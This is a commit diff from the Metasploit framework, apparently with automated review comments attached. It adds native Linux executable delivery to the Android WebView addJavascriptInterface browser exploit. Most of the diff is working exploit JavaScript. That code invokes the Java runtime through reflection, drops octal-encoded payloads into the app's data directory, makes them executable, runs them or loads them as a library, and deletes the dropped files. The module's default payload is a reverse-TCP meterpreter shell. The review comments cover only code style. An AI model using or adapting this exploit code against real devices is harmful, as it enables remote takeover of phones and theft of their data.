
Add support for native target in addjsif exploit.

joev 3 years ago
parent
commit
00dc6364b5

+ 54
- 27
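--- a/lib/msf/core/exploit/android.rb
+++ b/lib/msf/core/exploit/android.rb
@@ -19,7 +19,6 @@ module Exploit::Android
   }
 
   def add_javascript_interface_exploit_js(arch)
-    stagename = Rex::Text.rand_text_alpha(5)
     %Q|
       function exec(runtime, cmdArr) {
         var ch = 0;
@@ -47,44 +46,72 @@ module Exploit::Android
                          .getMethod('getRuntime', null)
                          .invoke(null, null);
 
-        // libraryData contains the bytes for a native shared object built via NDK
-        // which will load the "stage", which in this case is our android meterpreter stager.
-        var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
+        #{payload.arch[0] == ARCH_DALVIK ? stager_js(arch) : linux_exe_js(arch)}
 
-        // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
-        // another stager which loads android meterpreter from the msf handler.
-        var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
+        return true;
+      }
 
-        // get the process name, which will give us our data path
-        // $PPID does not seem to work on android 4.0, so we concat pids manually
-        var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
+      for (i in top) { if (attemptExploit(top[i]) === true) break; }
+    |
+  end
 
-        var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
-        var stagePath = path + '/#{stagename}.apk';
+  def stager_js(arch)
+    stagename = Rex::Text.rand_text_alpha(5)
+    %Q|
+      // libraryData contains the bytes for a native shared object built via NDK
+      // which will load the "stage", which in this case is our android meterpreter stager.
+      var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
+
+      // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
+      // another stager which loads android meterpreter from the msf handler.
+      var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
+
+      // get the process name, which will give us our data path
+      // $PPID does not seem to work on android 4.0, so we concat pids manually
+      var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
+      var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
+      var stagePath = path + '/#{stagename}.apk';
+
+      // build the library and chmod it
+      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
+      runtime.exec(['chmod', '700', libraryPath]).waitFor();
+
+      // build the stage, chmod it, and load it
+      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
+      runtime.exec(['chmod', '700', stagePath]).waitFor();
+
+      // load the library
+      runtime.load(libraryPath);
+
+      // delete dropped files
+      runtime.exec(['rm', stagePath]).waitFor();
+      runtime.exec(['rm', libraryPath]).waitFor();
+    |
+  end
 
-        // build the library and chmod it
-        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
-        runtime.exec(['chmod', '700', libraryPath]).waitFor();
+  def linux_exe_js(arch)
+    platform_list = Msf::Module::PlatformList.new(Msf::Module::Platform::Linux)
 
-        // build the stage, chmod it, and load it
-        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
-        runtime.exec(['chmod', '700', stagePath]).waitFor();
+    %Q|
+      var payloadData = "#{Rex::Text.to_octal(payload.encoded_exe(arch: arch, platform: platform_list), '\\\\0')}";
 
-        // load the library
-        runtime.load(libraryPath);
+      // get the process name, which will give us our data path
+      // $PPID does not seem to work on android 4.0, so we concat pids manually
+      var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
+      var payloadPath = path + '/#{Rex::Text.rand_text_alpha(8)}';
 
-        // delete dropped files
-        runtime.exec(['rm', stagePath]).waitFor();
-        runtime.exec(['rm', libraryPath]).waitFor();
+      // build the library and chmod it
+      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+payloadData+'" > '+payloadPath]).waitFor();
+      runtime.exec(['chmod', '700', payloadPath]).waitFor();
 
-        return true;
-      }
+      // run the payload
+      runtime.exec(['/system/bin/sh', '-c', payloadPath + ' &']).waitFor();
 
-      for (i in top) { if (attemptExploit(top[i]) === true) break; }
+      // delete dropped files
+      runtime.exec(['rm', payloadPath]).waitFor();
     |
   end
 
-
   # The NDK stager is used to launch a hidden APK
   def ndkstager(stagename, arch)
     data = MetasploitPayloads.read('android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')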
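Review bot: In `linux_exe_js` the comment `// build the library and chmod it` above the `echo -e "'+payloadData+'" > '+payloadPath` line is carried over from `stager_js` and no longer describes what follows — this branch writes the output of `payload.encoded_exe`, a native executable, not a shared library; `// write the payload binary and chmod it` would match the code. The two new methods `stager_js` and `linux_exe_js` also carry no header comment, unlike the neighbouring `# The NDK stager is used to launch a hidden APK` on `ndkstager`; a one-liner on each saying which payload arch it serves (Dalvik stage loaded through the NDK library versus a Linux executable) and that both return a JavaScript fragment interpolated into `add_javascript_interface_exploit_js` would make the dispatch easier to follow. That dispatch keys off `payload.arch[0] == ARCH_DALVIK` while the surrounding method receives `arch` as a parameter; if the two can ever disagree, it is worth a comment stating which one is authoritative. The last context lines sit inside `ndkstager`, whose body continues past the hunk.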

+ 2
- 2
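--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -67,8 +67,8 @@ class Metasploit3 < Msf::Exploit::Remote
         ['EDB', '31519'],
         ['OSVDB', '97520']
       ],
-      'Platform'            => 'android',
-      'Arch'                => ARCH_DALVIK,
+      'Platform'            => ['android', 'linux'],
+      'Arch'                => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
       'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
       'Targets'             => [ [ 'Automatic', {} ] ],
       'DisclosureDate'      => 'Dec 21 2012',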
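Review bot: The widened `'Arch'` list on the new line 71 only works together with the dispatch added in `lib/msf/core/exploit/android.rb`, where any payload whose first arch is not `ARCH_DALVIK` is routed to `linux_exe_js`; nothing in this module makes that coupling visible to the next maintainer. A short comment above the `'Arch'` line, e.g. `# non-Dalvik arches are delivered as native Linux executables by Exploit::Android`, would tie the two changes together. The `'Targets'` entry is still the single `'Automatic'` target, so the arches listed here presumably need to stay in step with what the mixin can actually build — worth confirming against `NDK_FILES` in the mixin.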
